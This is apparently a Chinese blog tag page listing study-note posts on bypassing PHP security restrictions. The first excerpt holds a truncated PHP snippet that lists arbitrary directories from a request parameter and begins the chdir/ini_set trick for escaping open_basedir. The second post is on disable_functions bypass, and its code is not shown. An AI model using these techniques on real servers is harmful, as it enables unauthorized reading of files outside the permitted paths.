含有 bypass 标签的文章

Bypass open_basedir

date 2021年03月08日 | category 学习笔记

列目录 test.php?c=/tmp/ <?php $c = $_GET['c']; $a = new DirectoryIterator($c); foreach($a as $f){ echo($f->__toString().'<br>'); } ?> 读文件 <?php mkdir('minx'); chdir('minx'); ini_set('open_basedir','..'); chdir('..');chdir('..');chdir('..');chdir('..'); ReadMore

php disable_functions bypass姿势

date 2016年12月22日 | category 学习笔记

[crayon-65f90ba0ece66812260021/] ReadMore